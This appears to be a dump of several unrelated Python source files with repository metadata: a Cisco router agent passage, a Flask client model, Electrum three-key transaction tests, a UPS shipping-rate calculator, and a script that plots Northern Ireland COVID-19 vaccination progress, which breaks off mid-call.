def _floating_ip_removed(self, ri, ex_gw_port, floating_ip, fixed_ip):
driver = self.driver_manager.get_driver(ri.id)
driver.floating_ip_removed(ri, ex_gw_port, floating_ip, fixed_ip)
def _enable_router_interface(self, ri, port):
driver = self.driver_manager.get_driver(ri.id)
driver.enable_router_interface(ri, port)
def _disable_router_interface(self, ri, port=None):
driver = self.driver_manager.get_driver(ri.id)
driver.disable_router_interface(ri, port)
def _routes_updated(self, ri):
"""Update the state of routes in the router.
Compares the current routes with the (configured) existing routes
and detect what was removed or added. Then configure the
logical router in the hosting device accordingly.
:param ri: RouterInfo corresponding to the router.
:return: None
:raises: networking_cisco.plugins.cisco.cfg_agent.cfg_exceptions.
DriverException if the configuration operation fails.
"""
new_routes = ri.router['routes']
old_routes = ri.routes
adds, removes = bc.common_utils.diff_list_of_dict(old_routes,
new_routes)
for route in adds:
LOG.debug("Added route entry is '%s'", route)
# remove replaced route from deleted route
for del_route in removes:
if route['destination'] == del_route['destination']:
removes.remove(del_route)
driver = self.driver_manager.get_driver(ri.id)
driver.routes_updated(ri, 'replace', route)
for route in removes:
LOG.debug("Removed route entry is '%s'", route)
driver = self.driver_manager.get_driver(ri.id)
driver.routes_updated(ri, 'delete', route)
ri.routes = new_routes
@staticmethod
def _set_subnet_info(port, subnet_id, is_primary=True):
ip = next((i['ip_address'] for i in port['fixed_ips']
if i['subnet_id'] == subnet_id), None)
if ip is None:
raise IPAddressMissingException(port_id=port['id'],
subnet_id=subnet_id)
subnet = next(sn for sn in port['subnets'] if sn['id'] == subnet_id)
prefixlen = netaddr.IPNetwork(subnet['cidr']).prefixlen
port['ip_info'] = {'subnet_id': subnet_id, 'is_primary': is_primary,
'ip_cidr': "%s/%s" % (ip, prefixlen)}
| 14,360 | 32,425 | 280 |
e14c362ef033e9d01558bffaeb08648350895f3c | 995 | py | Python | src/models/client.py | fibasile/ticket-gateway | 811a216281a17150adca3edf691f9cf5a1478d2f | [
"MIT"
] | null | null | null | src/models/client.py | fibasile/ticket-gateway | 811a216281a17150adca3edf691f9cf5a1478d2f | [
"MIT"
] | null | null | null | src/models/client.py | fibasile/ticket-gateway | 811a216281a17150adca3edf691f9cf5a1478d2f | [
"MIT"
] | null | null | null | """
Define the Channel model
"""
from . import db
from .abc import BaseModel, MetaBaseModel
from binascii import hexlify
import os
KEY_LENGTH = 64
class Client(db.Model, BaseModel, metaclass=MetaBaseModel):
""" The Channel model """
__tablename__ = 'client'
slug = db.Column(db.String(300), primary_key=True)
title = db.Column(db.String(300), nullable=True)
client_id = db.Column(db.String(300), nullable=False)
client_secret = db.Column(db.String(300), nullable=False)
def __init__(self, slug, title, client_id=None, client_secret=None):
""" Create a new Client """
self.slug = slug
self.title = title
self.client_id = client_id
self.client_secret = client_secret
if not client_id:
self.client_id = self.randomHex()
if not client_secret:
self.client_secret = self.randomHex()
@staticmethod
| 27.638889 | 72 | 0.657286 | """
Define the Channel model
"""
from . import db
from .abc import BaseModel, MetaBaseModel
from binascii import hexlify
import os
KEY_LENGTH = 64
class Client(db.Model, BaseModel, metaclass=MetaBaseModel):
""" The Channel model """
__tablename__ = 'client'
slug = db.Column(db.String(300), primary_key=True)
title = db.Column(db.String(300), nullable=True)
client_id = db.Column(db.String(300), nullable=False)
client_secret = db.Column(db.String(300), nullable=False)
def __init__(self, slug, title, client_id=None, client_secret=None):
""" Create a new Client """
self.slug = slug
self.title = title
self.client_id = client_id
self.client_secret = client_secret
if not client_id:
self.client_id = self.randomHex()
if not client_secret:
self.client_secret = self.randomHex()
@staticmethod
def randomHex():
key = hexlify(os.urandom(KEY_LENGTH))
return key
| 60 | 0 | 26 |
1c6561b063054a6ec52921b6fecd24fdbfbcb829 | 3,209 | py | Python | electrum/tests/test_three_keys_transaction.py | mgrychow/electrum-vault | a15b0fc5db4e83801cd7f1ba3defd56daa0b058a | [
"MIT"
] | 8 | 2020-03-18T21:55:38.000Z | 2021-03-01T12:54:47.000Z | electrum/tests/test_three_keys_transaction.py | mgrychow/electrum-vault | a15b0fc5db4e83801cd7f1ba3defd56daa0b058a | [
"MIT"
] | 6 | 2020-07-10T13:17:21.000Z | 2021-04-26T11:47:22.000Z | electrum/tests/test_three_keys_transaction.py | mgrychow/electrum-vault | a15b0fc5db4e83801cd7f1ba3defd56daa0b058a | [
"MIT"
] | 8 | 2020-05-10T11:04:15.000Z | 2021-05-06T14:51:46.000Z | from collections import namedtuple
from typing import List
from unittest import TestCase
from electrum import Transaction
from electrum.three_keys.multikey_generator import MultiKeyScriptGenerator
from electrum.three_keys.transaction import ThreeKeysTransaction, TxType
TX = '0200000001eaa85f4446a8d48b345592b7bc540678ef1e0f4a80b4893e9bedbf9aae636d9400000000280000255121023765a77db702ab87d5cf6431d81a4734d9a636eb95446ffe01fa06ac190ce56c51aefdffffff02008c86470000000017a9142664929e5ed5356477dad1404f51bb507e89f9aa87b0398ecb0300000017a914a2703755a1b5e5aa06e742f3db127628d6ed40cd876c030000'
| 38.202381 | 317 | 0.714241 | from collections import namedtuple
from typing import List
from unittest import TestCase
from electrum import Transaction
from electrum.three_keys.multikey_generator import MultiKeyScriptGenerator
from electrum.three_keys.transaction import ThreeKeysTransaction, TxType
TX = '0200000001eaa85f4446a8d48b345592b7bc540678ef1e0f4a80b4893e9bedbf9aae636d9400000000280000255121023765a77db702ab87d5cf6431d81a4734d9a636eb95446ffe01fa06ac190ce56c51aefdffffff02008c86470000000017a9142664929e5ed5356477dad1404f51bb507e89f9aa87b0398ecb0300000017a914a2703755a1b5e5aa06e742f3db127628d6ed40cd876c030000'
class DummyGenerator(MultiKeyScriptGenerator):
def get_redeem_script(self, public_keys: List[str]) -> str:
pass
def get_script_sig(self, signatures: List[str], public_keys: List[str]) -> str:
pass
class Test3KeysTransaction(TestCase):
def test_setting_multisig_generator(self):
tr = Transaction(None)
generator = DummyGenerator()
tr.multisig_script_generator = generator
self.assertTrue(generator is tr.multisig_script_generator)
def test_failed_multisig_setting(self):
Gen = namedtuple('Gen', ['a', 'b'])
generator = Gen(1, 1)
tr = Transaction(None)
with self.assertRaises(TypeError) as error:
tr.multisig_script_generator = generator
self.assertEqual(
'Cannot set multisig_script_generator. It has to be MultisigScriptGenerator',
str(error.exception)
)
def test_tx_type_setting(self):
tx = ThreeKeysTransaction(None, TxType.ALERT_PENDING)
self.assertEqual(tx.tx_type, TxType.ALERT_PENDING)
with self.assertRaises(ValueError) as err:
ThreeKeysTransaction(None, 'unknown type')
self.assertTrue('tx_type has to be TxType' in str(err.exception))
def test_creating_3key_tx_from_transaction(self):
tx = Transaction(TX)
# assert correct serialization
self.assertEqual(TX, tx.serialize())
# wrong type passed
class WrongTxType: pass
with self.assertRaises(ValueError) as err:
ThreeKeysTransaction.from_tx(WrongTxType())
self.assertEqual('Wrong transaction type WrongTxType', str(err.exception))
three_key_tx = ThreeKeysTransaction.from_tx(tx)
self.assertEqual(TX, three_key_tx.serialize())
self.assertEqual(TxType.NONVAULT, three_key_tx.tx_type)
self.assertTrue(isinstance(three_key_tx, Transaction))
class TestTxType(TestCase):
def setUp(self):
self.inputs = [(item.name, item) for item in TxType]
def test_creating_from_string(self):
for str_, type_ in self.inputs:
with self.subTest((str_, type_)):
tx_type = TxType.from_str(str_)
self.assertEqual(type_, tx_type)
def test_creating_error(self):
inp = 'wrong key'
with self.assertRaises(ValueError) as err:
TxType.from_str(inp)
self.assertEqual(f"Cannot get TxType for '{inp}'", str(err.exception))
def test_identity(self):
type1 = TxType.INSTANT
type2 = TxType.from_str(str(type1.value))
self.assertEqual(type1, type2)
| 2,232 | 47 | 337 |
483a6d2c7223c8cfe9fb9a0e0968b1ec56d31e1b | 2,745 | py | Python | sirius/matrices.py | natebunnyfield/sirius | b57863e9d5f241ee8a3c7c2b43bf0da5b85d486c | [
"BSD-3-Clause"
] | 1 | 2019-10-01T17:15:24.000Z | 2019-10-01T17:15:24.000Z | sirius/matrices.py | natebunnyfield/sirius | b57863e9d5f241ee8a3c7c2b43bf0da5b85d486c | [
"BSD-3-Clause"
] | null | null | null | sirius/matrices.py | natebunnyfield/sirius | b57863e9d5f241ee8a3c7c2b43bf0da5b85d486c | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from math import ceil
import os
import yaml
CONFIG_DIR = os.path.abspath(os.path.join(__file__, '..', 'shipping_configs'))
# ups ground
UPS_GROUND_ZIP_TO_ZONE = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_ground_zip_to_zone.yaml'), 'r'))
UPS_GROUND_ZONE_WEIGHT_PRICE = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_ground_zone_weight_price.yaml'), 'r'))
UPS_GROUND_ZONE_44 = [str(line.rstrip()) for line in open(os.path.join(CONFIG_DIR, 'zone44.txt'))]
UPS_GROUND_ZONE_46 = [str(line.rstrip()) for line in open(os.path.join(CONFIG_DIR, 'zone46.txt'))]
# ups mail innovations
UPS_MI_RATES_OZ = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_mi_rates_oz.yaml')))
UPS_MI_RATES_LBS = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_mi_rates_lbs.yaml')))
def get_cheapest_option(zipcode, weight):
"""
gets the cheapest price for a box
"""
# weights come in ounces - if it's less than a pound - send it via mail innovations
if weight <= 16:
for tier in sorted(UPS_MI_RATES_OZ):
if ceil(weight) <= tier:
return 'UPS Mail Innovations', UPS_MI_RATES_OZ[tier]
# over a pound? that gets tricky. convert to pounds
weight = ceil(float(weight) / 16)
# check if the zipcode is in the 44/46 lists (hawaii or alaska)
zipcode = str(zipcode)
if zipcode in UPS_GROUND_ZONE_44:
zone = '044'
elif zipcode in UPS_GROUND_ZONE_46:
zone = '046'
else: # it's in the lower 48
zipcode = str(zipcode)[:3] # ups only uses the first three digits
zone = UPS_GROUND_ZIP_TO_ZONE[zipcode]
# check weights
options = [] # ups mail innovations
for tier in sorted(UPS_MI_RATES_LBS):
if weight <= tier:
options.append(('UPS Mail Innovations', UPS_MI_RATES_LBS[tier]))
break
# ups ground
for tier in sorted(UPS_GROUND_ZONE_WEIGHT_PRICE[zone]):
if weight <= tier:
options.append(('UPS Ground', UPS_GROUND_ZONE_WEIGHT_PRICE[zone][tier]))
break
# get cheapest option
return min(options, key=lambda x: x[1])
def get_irregular_price(zipcode, weight):
"""
does much of the same as `get_cheapest_option`, but skips all MI
"""
weight = ceil(float(weight) / 16)
zipcode = str(zipcode)
if zipcode in UPS_GROUND_ZONE_44:
zone = '044'
elif zipcode in UPS_GROUND_ZONE_46:
zone = '046'
else: # it's in the lower 48
zipcode = str(zipcode)[:3] # ups only uses the first three digits
zone = UPS_GROUND_ZIP_TO_ZONE[zipcode]
for tier in sorted(UPS_GROUND_ZONE_WEIGHT_PRICE[zone]):
if weight <= tier:
return UPS_GROUND_ZONE_WEIGHT_PRICE[zone][tier]
| 35.192308 | 114 | 0.668488 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from math import ceil
import os
import yaml
CONFIG_DIR = os.path.abspath(os.path.join(__file__, '..', 'shipping_configs'))
# ups ground
UPS_GROUND_ZIP_TO_ZONE = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_ground_zip_to_zone.yaml'), 'r'))
UPS_GROUND_ZONE_WEIGHT_PRICE = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_ground_zone_weight_price.yaml'), 'r'))
UPS_GROUND_ZONE_44 = [str(line.rstrip()) for line in open(os.path.join(CONFIG_DIR, 'zone44.txt'))]
UPS_GROUND_ZONE_46 = [str(line.rstrip()) for line in open(os.path.join(CONFIG_DIR, 'zone46.txt'))]
# ups mail innovations
UPS_MI_RATES_OZ = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_mi_rates_oz.yaml')))
UPS_MI_RATES_LBS = yaml.load(open(os.path.join(CONFIG_DIR, 'ups_mi_rates_lbs.yaml')))
def get_cheapest_option(zipcode, weight):
"""
gets the cheapest price for a box
"""
# weights come in ounces - if it's less than a pound - send it via mail innovations
if weight <= 16:
for tier in sorted(UPS_MI_RATES_OZ):
if ceil(weight) <= tier:
return 'UPS Mail Innovations', UPS_MI_RATES_OZ[tier]
# over a pound? that gets tricky. convert to pounds
weight = ceil(float(weight) / 16)
# check if the zipcode is in the 44/46 lists (hawaii or alaska)
zipcode = str(zipcode)
if zipcode in UPS_GROUND_ZONE_44:
zone = '044'
elif zipcode in UPS_GROUND_ZONE_46:
zone = '046'
else: # it's in the lower 48
zipcode = str(zipcode)[:3] # ups only uses the first three digits
zone = UPS_GROUND_ZIP_TO_ZONE[zipcode]
# check weights
options = [] # ups mail innovations
for tier in sorted(UPS_MI_RATES_LBS):
if weight <= tier:
options.append(('UPS Mail Innovations', UPS_MI_RATES_LBS[tier]))
break
# ups ground
for tier in sorted(UPS_GROUND_ZONE_WEIGHT_PRICE[zone]):
if weight <= tier:
options.append(('UPS Ground', UPS_GROUND_ZONE_WEIGHT_PRICE[zone][tier]))
break
# get cheapest option
return min(options, key=lambda x: x[1])
def get_irregular_price(zipcode, weight):
"""
does much of the same as `get_cheapest_option`, but skips all MI
"""
weight = ceil(float(weight) / 16)
zipcode = str(zipcode)
if zipcode in UPS_GROUND_ZONE_44:
zone = '044'
elif zipcode in UPS_GROUND_ZONE_46:
zone = '046'
else: # it's in the lower 48
zipcode = str(zipcode)[:3] # ups only uses the first three digits
zone = UPS_GROUND_ZIP_TO_ZONE[zipcode]
for tier in sorted(UPS_GROUND_ZONE_WEIGHT_PRICE[zone]):
if weight <= tier:
return UPS_GROUND_ZONE_WEIGHT_PRICE[zone][tier]
| 0 | 0 | 0 |
0b23c6c86af91d41e4d8bda165dad1aab59afd10 | 16,743 | py | Python | music.py | edvinassaikevicius/Discord_Music_Bot | 931f64c76d3164626ddee27ef00bfef443ca27a6 | [
"MIT"
] | null | null | null | music.py | edvinassaikevicius/Discord_Music_Bot | 931f64c76d3164626ddee27ef00bfef443ca27a6 | [
"MIT"
] | null | null | null | music.py | edvinassaikevicius/Discord_Music_Bot | 931f64c76d3164626ddee27ef00bfef443ca27a6 | [
"MIT"
] | null | null | null | import re
import random
import discord
import lavalink
from discord.ext import commands
import asyncio
import fileRead
url_rx = re.compile(r'https?://(?:www\.)?.+')
"""
Robert A. USF Computer Science
A cog to hold all of the functions used to play music for the bot.
""" | 49.979104 | 217 | 0.61351 | import re
import random
import discord
import lavalink
from discord.ext import commands
import asyncio
import fileRead
url_rx = re.compile(r'https?://(?:www\.)?.+')
"""
Robert A. USF Computer Science
A cog to hold all of the functions used to play music for the bot.
"""
class music(commands.Cog):
def __init__(self, bot):
self.bot = bot
if not hasattr(bot, 'lavalink'): # This ensures the client isn't overwritten during cog reloads.
bot.lavalink = lavalink.Client(bot.user.id)
bot.lavalink.add_node('127.0.0.1', 2333, 'changeme123', 'na', 'local_music_node') # PASSWORD HERE MUST MATCH YML
bot.add_listener(bot.lavalink.voice_update_handler, 'on_socket_response')
lavalink.add_event_hook(self.track_hook)
def cog_unload(self):
""" Cog unload handler. This removes any event hooks that were registered. """
self.bot.lavalink._event_hooks.clear()
async def cog_before_invoke(self, ctx):
""" Command before-invoke handler. """
guild_check = ctx.guild is not None
# This is essentially the same as `@commands.guild_only()`
# except it saves us repeating ourselves (and also a few lines).
if guild_check:
await self.ensure_voice(ctx)
# Ensure that the bot and command author share a mutual voicechannel.
return guild_check
async def cog_command_error(self, ctx, error):
if isinstance(error, commands.CommandInvokeError):
await ctx.send(error.original)
# The above handles errors thrown in this cog and shows them to the user.
async def ensure_voice(self, ctx):
""" This check ensures that the bot and command author are in the same voicechannel. """
player = self.bot.lavalink.player_manager.create(ctx.guild.id, endpoint=str(ctx.guild.region))
should_connect = ctx.command.name in ('play','playfromlist')
if not ctx.author.voice or not ctx.author.voice.channel:
# Our cog_command_error handler catches this and sends it to the voicechannel.
# Exceptions allow us to "short-circuit" command invocation via checks so the
# execution state of the command goes no further.
raise commands.CommandInvokeError('Join a voicechannel first.')
if not player.is_connected:
if not should_connect:
raise commands.CommandInvokeError('Not connected.')
permissions = ctx.author.voice.channel.permissions_for(ctx.me)
if not permissions.connect or not permissions.speak:
raise commands.CommandInvokeError('I need the `CONNECT` and `SPEAK` permissions.')
player.store('channel', ctx.channel.id)
await ctx.guild.change_voice_state(channel=ctx.author.voice.channel)
else:
if int(player.channel_id) != ctx.author.voice.channel.id:
raise commands.CommandInvokeError('You need to be in my voicechannel.')
async def track_hook(self, event):
if isinstance(event, lavalink.events.QueueEndEvent):
# When this track_hook receives a "QueueEndEvent" from lavalink.py
# it indicates that there are no tracks left in the player's queue.
# To save on resources, we can tell the bot to disconnect from the voicechannel.
guild_id = int(event.player.guild_id)
guild = self.bot.get_guild(guild_id)
await guild.change_voice_state(channel=None)
@commands.command(name = 'play', description=".play {song name} to play a song, will connect the bot.") #Allows for a song to be played, does not make sure people are in the same chat.
@commands.has_any_role('Dj','Administrator','DJ')
async def play_song(self, ctx, *, query):
""" Searches and plays a song from a given query. """
# Get the player for this guild from cache.
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
query = query.strip('<>')
# Check if the user input might be a URL. If it isn't, we can Lavalink do a YouTube search for it instead.
if not url_rx.match(query):
query = f'ytsearch:{query}'
# Get the results for the query from Lavalink.
results = await player.node.get_tracks(query)
# Results could be None if Lavalink returns an invalid response (non-JSON/non-200 (OK)).
# ALternatively, resullts['tracks'] could be an empty array if the query yielded no tracks.
if not results or not results['tracks']:
return await ctx.send('Nothing found!')
embed = discord.Embed(color=discord.Color.blurple())
# Valid loadTypes are:
# TRACK_LOADED - single video/direct URL)
# PLAYLIST_LOADED - direct URL to playlist)
# SEARCH_RESULT - query prefixed with either ytsearch: or scsearch:.
# NO_MATCHES - query yielded no results
# LOAD_FAILED - most likely, the video encountered an exception during loading.
if results['loadType'] == 'PLAYLIST_LOADED':
tracks = results['tracks']
for track in tracks:
# Add all of the tracks from the playlist to the queue.
player.add(requester=ctx.author.id, track=track)
embed.title = 'Playlist Enqueued!'
embed.description = f'{results["playlistInfo"]["name"]} - {len(tracks)} tracks'
else:
track = results['tracks'][0]
embed.title = 'Track Enqueued'
embed.description = f'[{track["info"]["title"]}]({track["info"]["uri"]})'
track = lavalink.models.AudioTrack(track, ctx.author.id, recommended=True)
player.add(requester=ctx.author.id, track=track)
await ctx.send(embed=embed)
if not player.is_playing:
await player.play()
@commands.command(name="playfromlist",aliases = ["pfpl","playl"],description="Loads a playlist into the queue to be played.")
@commands.has_any_role("Dj","DJ","Administrator")
async def play_from_list(self,ctx,*,playlist_name):
""" Searches and plays a song from a given query. """
# Get the player for this guild from cache.
songlist = fileRead.play_playlist(ctx,playlist_name)
if songlist == False:
return await ctx.channel.send("Playlist not found.")
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
# This is to play a song up front so you dont have to wait for whole queue to hear music
query = songlist[0]
songlist.pop(0)
query = f'ytsearch:{query}'
results = await player.node.get_tracks(query)
track = results['tracks'][0]
track = lavalink.models.AudioTrack(track, ctx.author.id, recommended=True)
player.add(requester=ctx.author.id, track=track)
if not player.is_playing:
await player.play()
for track in songlist: # Add all remaining songs to list.
try:
query = f'ytsearch:{track}'
results = await player.node.get_tracks(query)
track = results['tracks'][0]
track = lavalink.models.AudioTrack(track, ctx.author.id, recommended=True)
player.add(requester=ctx.author.id, track=track)
except Exception as error: # Catches song not found
print(error)
await ctx.send("Playlist loaded successfully.")
if not player.is_playing:
await player.play()
@commands.command(name = 'skip',description="Skips currently playing song.") #skips currently playing song
@commands.has_any_role('Dj','Administrator','DJ')
async def skip_song(self, ctx,amount = 1):
try:
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
x = 0
while (x < amount):
x = x + 1
if ctx.author.voice is not None and ctx.author.voice.channel.id == int(player.channel_id):
if not player.is_playing:
return await ctx.channel.send("Nothing playing to skip.")
else:
await player.skip()
if x == 1: # make sure song skipped only prints once.
await ctx.channel.send("Song skipped.")
else:
return await ctx.channel.send("Please join the same voice channel as me.")
except:
return await ctx.channel.send("Nothing playing.")
@commands.command(name = "clear",description="Clears all of the currently playing songs and makes the bot disconnect.")
@commands.has_any_role("Dj","DJ","Administrator")
async def clear_queue(self,ctx):
try:
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
if ctx.author.voice is not None and ctx.author.voice.channel.id == int(player.channel_id):
if player.is_playing:
while player.is_playing:
await player.skip()
await ctx.channel.send("Songs Cleared.")
else:
await ctx.channel.send("Nothing playing to clear.")
else:
await ctx.channel.send("Please join the same voice channel as me.")
except:
await ctx.channel.send("Nothing playing.")
# may remove this as it is depricated by clear, a safer alternative.
@commands.command(name = 'disconnect', aliases = ['dc'],description="Force disconnects the bot from a voice channel") #bad practice, better to use clear.
@commands.has_any_role('Dj','Administrator','DJ')
async def disconnect_bot(self,ctx):
try:
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
if ctx.author.voice is not None and ctx.author.voice.channel.id == int(player.channel_id):
if not player.is_connected:
await ctx.channel.send("No bot is connected.")
else:
await ctx.channel.send("Bot disconnected.")
guild_id = int(player.guild_id)
await self.connect_to(guild_id,None)
else:
await ctx.channel.send("Please join the same voice channel as me.")
except:
await ctx.channel.send("Nothing playing.")
@commands.command(name='pause',aliases=["ps"],description="Pauses a song if one is playing.") #command to pause currently playing music
@commands.has_any_role('Dj','Administrator','DJ')
async def pause_bot(self,ctx):
try:
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
if ctx.author.voice is not None and ctx.author.voice.channel.id == int(player.channel_id):
if player.is_playing:
status = True
await ctx.channel.send("Song has been paused.")
await player.set_pause(True)
i = 0
while i < 84: # This will periodically check to see if it has been unpaused
await asyncio.sleep(5)
i = i + 1
if not player.paused: # If its been unpaused no need to keep counting. (Also fixes some issues)
status = False
break
if player.paused and player.is_playing and status is True:
await player.set_pause(False) # If paused unpause.
await ctx.channel.send("Automatically unpaused.")
else:
await ctx.channel.send("No song is playing to be paused.")
else:
await ctx.channel.send("Please join the same voice channel as me.")
except:
await ctx.channel.send("Nothing playing.")
@commands.command(name='unpause', aliases=['resume','start','up'],description="Unpauses a paused song.") #command to unpause currently paused music
@commands.has_any_role('Dj','Administrator','DJ')
async def unpause_bot(self,ctx):
try:
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
if ctx.author.voice.channel.id == int(player.channel_id):
if player.paused:
await ctx.channel.send("Resuming song.")
await player.set_pause(False)
else:
await ctx.channel.send("Nothing is paused to resume.")
else:
await ctx.channel.send("Please join the same voice channel as me.")
except:
await ctx.channel.send("Nothing playing.")
@commands.command(name='queue',aliases=['playlist','songlist','upnext'],description="Shows songs up next in order, with the currently playing at the top.") # display the songs in the order they are waiting to play
@commands.has_any_role('Dj','Administrator','DJ')
async def queue(self,ctx, page = 1):
if not isinstance(page, int): # Stop here if the page is not a valid number (save processing time).
return ctx.channel.send("Please enter a valid number.")
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
if player.is_playing:
songlist = player.queue
list_collection = []
complete_list = ''
complete_list = complete_list + "NP: " + player.current['title'] + "\n"
i = 0
for song in songlist:
complete_list = complete_list + f"{i + 1}: {song['title']}\n"
i = i + 1
if i % 10 == 0: # Break into pages of 10 and add to a collection
list_collection.append(complete_list)
complete_list = ''
if i % 10 != 0 or i == 0: # Check for the case where it is not a perfect multiple, add "half page" (< 10) or if there is only one song playing
list_collection.append(complete_list)
selection = page - 1
embed = discord.Embed()
# add an inital if to check if it is an int then do page -1 if its not int default to page 0
if int(selection) < 0: # handle negative number
list_collection[0] += "Page: 1/" + str(len(list_collection))
embed.description = list_collection[0]
elif int(selection) > len(list_collection) - 1: # Handle a case where the index is greater than page amount
list_collection[len(list_collection) - 1] += "Page: " + str(len(list_collection)) + "/" + str(len(list_collection))
embed.description = list_collection[len(list_collection) - 1]
else: # Handle a valid input case.
list_collection[selection] += "Page: " + str(page) + "/" + str(len(list_collection))
embed.description = list_collection[selection]
await ctx.channel.send(embed=embed)
else:
await ctx.channel.send("Nothing is queued.")
# This needs to be tested more thoroughly. Broke my bot again.
@commands.command(name = "shuffle",description = "New shuffle function that has to be called once and makes a new queue. Result is shown on \"queue\" commands now..")
@commands.has_any_role("Dj","DJ","Administrator")
async def shuffle(self,ctx):
try:
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
if ctx.author.voice is not None and ctx.author.voice.channel.id == int(player.channel_id):
if player.is_playing:
songlist = player.queue
random.shuffle(songlist)
await ctx.channel.send("Finished.")
else:
await ctx.channel.send("Nothing playing!")
else:
await ctx.channel.send("Please join the same voice channel as me and ensure something is playing.")
except Exception as error:
print(error)
@commands.command(name = 'clearbotcache', description="Used to clear the bot cache, only use after reading the Readme file. This can have negative consequences and should be avoided.")
@commands.has_permissions(ban_members=True, kick_members=True, manage_roles=True, administrator=True)
async def disconnect_player(self, ctx):
player = self.bot.lavalink.player_manager.create(ctx.guild.id, endpoint=str(ctx.guild.region))
await self.bot.lavalink.player_manager.destroy(int(ctx.guild.id))
await ctx.channel.send("Bot player has been cleared successfully.")
def setup(bot):
bot.add_cog(music(bot)) | 8,180 | 8,239 | 54 |
579cdee2a6b24c2118b16d29b2ea7f8695a96d6a | 4,766 | py | Python | notebooks/vacc_booster_gap.py | pbarber/ni-covid-tweets | fd108d8d570aafe4dca6741066af8c2ef92e6b03 | [
"MIT"
] | 1 | 2021-12-13T23:08:45.000Z | 2021-12-13T23:08:45.000Z | notebooks/vacc_booster_gap.py | aarong1/ni-covid-tweets | cbe1e2bc4333b31cdf4e281ed04fc77743938faa | [
"MIT"
] | 18 | 2021-03-30T19:45:37.000Z | 2022-02-02T18:36:17.000Z | notebooks/vacc_booster_gap.py | aarong1/ni-covid-tweets | cbe1e2bc4333b31cdf4e281ed04fc77743938faa | [
"MIT"
] | 1 | 2021-12-13T23:08:32.000Z | 2021-12-13T23:08:32.000Z | # %%
import datetime
import pandas
import altair
from plot_shared import plot_points_average_and_trend
# %%
df = pandas.read_csv('https://api.coronavirus.data.gov.uk/v2/data?areaType=nation&metric=cumPeopleVaccinatedFirstDoseByPublishDate&metric=cumPeopleVaccinatedSecondDoseByPublishDate&format=csv')
df.rename(columns={
'cumPeopleVaccinatedFirstDoseByPublishDate': 'First',
'cumPeopleVaccinatedSecondDoseByPublishDate': 'Second',
'areaName': 'Nation',
'date': 'Publication Date'
}, inplace=True)
df = df.drop(columns=['areaCode','areaType']).melt(id_vars=['Publication Date','Nation'], var_name='Dose', value_name='People')
# %%
ni = pandas.read_csv('../sam/doses.csv')
ni['Dose'] = ni['Dose'].str.replace('Dose 1', 'First')
ni['Dose'] = ni['Dose'].str.replace('Dose 2', 'Second')
ni['Dose'] = ni['Dose'].str.replace('Dose 3', 'Third')
# %%
history = df[df['Nation']=='Northern Ireland'][['Publication Date','Dose','People']]
ni.rename(columns={'Date':'Publication Date','Total':'People'}, inplace=True)
all = history.merge(ni, on=['Publication Date','Dose'], how='outer', suffixes=('','_bot'))
all['People'] = all['People'].fillna(all['People_bot'])
all = all[['Publication Date','Dose','People']]
# %%
boosters = all[all['Dose']=='Booster'][['Publication Date','People']]
boosters['Publication Date'] = pandas.to_datetime(boosters['Publication Date'])
dose2s = all[all['Dose']=='Second'][['Publication Date','People']]
dose2s['Publication Date'] = pandas.to_datetime(dose2s['Publication Date'])
dose2s['Booster Target Date 6M'] = pandas.to_datetime(dose2s['Publication Date']) + pandas.to_timedelta(183, unit='d')
dose2s['Booster Target Date 7M'] = pandas.to_datetime(dose2s['Publication Date']) + pandas.to_timedelta(183+31, unit='d')
dose2s['Booster Target Date 8M'] = pandas.to_datetime(dose2s['Publication Date']) + pandas.to_timedelta(183+62, unit='d')
boosters = boosters.merge(dose2s[['Booster Target Date 6M','People']], left_on='Publication Date', right_on='Booster Target Date 6M', how='left', suffixes=('', '_target'))
boosters = boosters[['Publication Date','People','People_target']]
boosters.rename(columns={'People':'Booster doses', 'People_target': 'Second doses 6 months earlier'}, inplace=True)
boosters = boosters.merge(dose2s[['Booster Target Date 7M','People']], left_on='Publication Date', right_on='Booster Target Date 7M', how='left', suffixes=('', '_target'))
boosters = boosters[['Publication Date','Booster doses','Second doses 6 months earlier','People']]
boosters.rename(columns={'People': 'Second doses 7 months earlier'}, inplace=True)
boosters = boosters.merge(dose2s[['Booster Target Date 8M','People']], left_on='Publication Date', right_on='Booster Target Date 8M', how='left', suffixes=('', '_target'))
boosters = boosters[['Publication Date','Booster doses','Second doses 6 months earlier','Second doses 7 months earlier','People']]
boosters.rename(columns={'People': 'Second doses 8 months earlier'}, inplace=True)
boosters = boosters.melt(id_vars='Publication Date', var_name='Metric', value_name='Doses')
# %%
plot_points_average_and_trend(
[
{
'points': None,
'line': all.set_index(['Publication Date','Dose'])['People'],
'colour': 'Dose',
'date_col': 'Publication Date',
'x_title': 'Publication Date',
'y_title': 'Total doses',
'scales': ['linear'],
'height': 450,
'width': 800,
},
],
'NI COVID-19 vaccination progress up to %s' %(
datetime.datetime.today().strftime('%A %-d %B %Y'),
),
[
'Dose 1/2 data from PHE dashboard/API, Dose 3/Booster collected from NI dashboard',
'https://twitter.com/ni_covid19_data'
]
)
# %%
p = plot_points_average_and_trend(
[
{
'points': None,
'line': boosters.set_index(['Publication Date','Metric'])['Doses'],
'colour': 'Metric',
'date_col': 'Publication Date',
'x_title': 'Date',
'y_title': 'Total doses',
'scales': ['linear'],
'height': 450,
'width': 800,
# 'colour_domain': ['Booster doses','Second doses 6 months earlier','Second doses 7 months earlier','Second doses 8 months earlier'],
# 'colour_range': ['#ff0000','#2b7e9e','#52b4cf','#7eedff'],
},
],
'NI COVID-19 booster vaccination progress vs second dose up to %s' %(
datetime.datetime.today().strftime('%A %-d %B %Y'),
),
[
